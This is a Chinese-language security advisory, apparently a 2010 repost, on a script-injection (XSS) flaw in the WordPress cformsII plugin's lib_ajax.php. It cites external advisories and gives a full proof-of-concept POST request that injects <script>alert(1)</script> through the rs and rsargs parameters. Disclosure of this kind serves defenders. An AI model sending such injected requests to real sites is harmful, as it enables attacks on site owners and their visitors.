WordPress cformsII插件rs和rsargs参数脚本注入漏洞

发表于 2010年11月04日
Vulndb

发布时间：2010-11-01
影响版本：Nicole Stich cformsII 11.5
漏洞描述：WordPress是一款免费的论坛Blog系统。

WordPress所使用的cformsII插件没有正确的过滤用户提交给wp-content/plugins/cforms /lib_ajax.php页面的rs和rsargs参数便显示给了用户。攻击者可以通过提交恶意的POST请求来利用这个漏洞，当用户查看生成页面时就会导致执行所注入的代码。

参考：
http://secunia.com/advisories/42006/
http://www.conviso.com.br/security-advisory-cform-wordpress-plugin-v-11-cve-2010-3977/

测试方法：
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

Request:

http://<server>/wp-content/plugins/cforms/lib_ajax.php

POST /wp-content/plugins/cforms/lib_ajax.php HTTP/1.1

Host: <server>

User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:

1.9.2.10) Gecko/20100914 Firefox/3.6.10

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 115

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Content-Length: 219

Cookie: wp-settings-1=m0%3Do%26m1%3Do%26m2%3Do%26m3%3Do%26m4%3Do%26m5%3Do

%26m6%3Do%26m7%3Do%26m8%3Do%26urlbutton%3Dnone%26editor%3Dtinymce

%26imgsize%3Dfull%26align%3Dcenter%26hidetb%3D1%26m9%3Dc%26m10%3Do

%26uploader%3D1%26m11%3Do; wp-settings-time-1=1285758765;

c o m m e n t _ a u t h o r _ 9 3 f 4 1 b a 0 b 1 6 f 3 4 6 7 6 f 8 0 2 0 5 8 e 8 2 3 8 8 f 6 = t e s t  ;

comment_author_email_93f41ba0b16f34676f802058e82388f6=rbranco_nospam

%40checkpoint.com

Pragma: no-cache

Cache-Control: no-cache

rs=<script>alert(1)</script>&rst=&rsrnd=1287506634854&rsargs[]=1$#

$<script>alert(1)</script>$#$rbranco_nospam@checkpoint.com$#$http://

www.checkpoint.com$#$<script>alert(1)</script>